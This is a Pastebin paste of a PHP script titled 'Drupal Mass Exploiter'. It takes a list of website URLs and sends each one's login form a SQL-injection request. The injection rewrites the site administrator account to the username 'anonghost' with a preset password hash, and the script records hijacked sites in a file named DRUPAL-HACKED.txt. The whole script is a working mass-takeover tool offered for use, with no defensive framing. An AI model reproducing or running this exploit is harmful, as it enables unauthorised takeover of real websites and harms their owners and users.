Advertisement
Elmagico

drupal Mass Exploiter

Aug 10th, 2015
1,241
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.64 KB | None | 0 0
  1. <b>.:: Drupal Mass Exploiter Developed By Magico ::.</b><br>
  2. <b>.:: https://www.facebook.com/magico.sec ::.</b>
  3. <?php
  4. echo'<form method="POST" action="">
  5. <textarea name="urls" cols="50" rows="16" placeholder="http://www.site.com/" ></textarea><br>
  6. <input type="submit" name="submit" value="submit">
  7. </form>
  8. ';
  9. $urls = $_POST['urls'];
  10. $sites = explode("\r\n",$urls);
  11. foreach($sites as $url){
  12. $url =trim($url);
  13.  
  14. $file = fopen("DRUPAL-HACKED.txt", "a");
  15. error_reporting(0);
  16. if (isset($_POST['submit'])) {
  17.     //$url = $_POST['url'];
  18.     $post_data = "name[0;update users set name %3D 'anonghost' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  19.     $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  20. ", 'content' => $post_data));
  21.     $ctx = stream_context_create($params);
  22.     $data = file_get_contents($url . '/user/login/', null, $ctx);
  23.     echo "<h4>Scanning at \"/user/login/</h4>\"";
  24.     if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  25.         $fp = fopen("DRUPAL-HACKED.txt", 'a');
  26.         echo "Success! User:anonghost Pass:admin at {$url}/user/login <br>";
  27.         echo '<font color="#00FF66">Finished scanning. check => </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  28.         echo "<br>---------------------------------------------------------------------------------------<br>";
  29.         fwrite($fp, "Succes! User:anonghost Pass:admin -> {$url}/user/login");
  30.         fwrite($fp, "
  31. ");
  32.         fwrite($fp, "======================================Magico==========================================================");
  33.         fwrite($fp, "
  34. ");
  35.         fclose($fp);
  36.     } else {
  37.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  38.     }
  39. }
  40. if (isset($_POST['submit'])) {
  41.     //$url = "http://" . $_GET['url'] . "/";
  42.     $post_data = "name[0;update users set name %3D 'anonghost' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  43.     $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  44. ", 'content' => $post_data));
  45.     $ctx = stream_context_create($params);
  46.     $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
  47.     echo "<h4>Scanning at \"Index</h4>\"";
  48.     if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  49.         $fp = fopen("DRUPAL-HACKED.txt", 'a');
  50.         echo "Success! User:anonghost Pass:admin at {$url}/user/login <br>";
  51.         echo '<font color="#00FF66">Finished scanning. check =>  </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  52.         echo "<br>======================================================================================<br>";
  53.         fwrite($fp, "Success! User:anonghost Pass:admin -> {$url}/user/login");
  54.         fwrite($fp, "
  55. ");
  56.         fwrite($fp, "======================================Magico===========================================================");
  57.         fwrite($fp, "
  58. ");
  59.         fclose($fp);
  60.     } else {
  61.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  62.         echo "<br>======================================================================================<br>";
  63.     }
  64. }
  65. //==========
  66. }// end foreach
  67.  
  68.  
  69. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement